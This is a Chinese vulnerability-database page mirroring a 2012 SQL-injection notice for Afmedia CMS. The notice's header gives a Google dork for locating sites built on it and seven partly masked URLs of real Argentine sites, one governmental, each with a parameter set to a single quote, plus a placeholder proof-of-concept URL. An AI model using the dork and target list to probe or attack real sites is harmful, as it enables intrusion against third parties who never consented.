Afmedia CMS SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1047652 漏洞类型
发布时间 2012-04-20 更新时间 2012-04-20
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012040152
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
##################################################
# Exploit Title: CMS afmedia Vuln [ Sqli ]
# Vendor: http://www.alejandrofalappa.com.ar/
# Date: 18/04/2012
# Author: xDarkSton3x
# E-mail : xdarkston3x@msn.com
# Category: webapps
# Google dork: intext:Diseño y Programacin Alejandro Falappa
# Example Sites : 
http://www.laspxxxejas.gov.ar/nota.php?id=%27
http://www.gamaxxxportados.com.ar/producto.php?id=%27
http://www.noticixxxmasnoticias.com.ar/noticiastipo.php?tipo=%27
http://armstronxxxiajes.com.ar/destinos.php?tipo=%27
http://www.matxxxntoycanto.com.ar/contenidos.php?tipo=%27
http://www.cenxxxndustrial.com.ar/not.php?id=%27
http://www.pintxxxsquality.com.ar/product.php?hoja=%27

##################################################

[~]Exploit/p0c :
http://www.site.com/x.php?var=[sqli]

Greetz [ Rs4 - B4nz0k - FailRoot - FailSoft - W4rn1ng]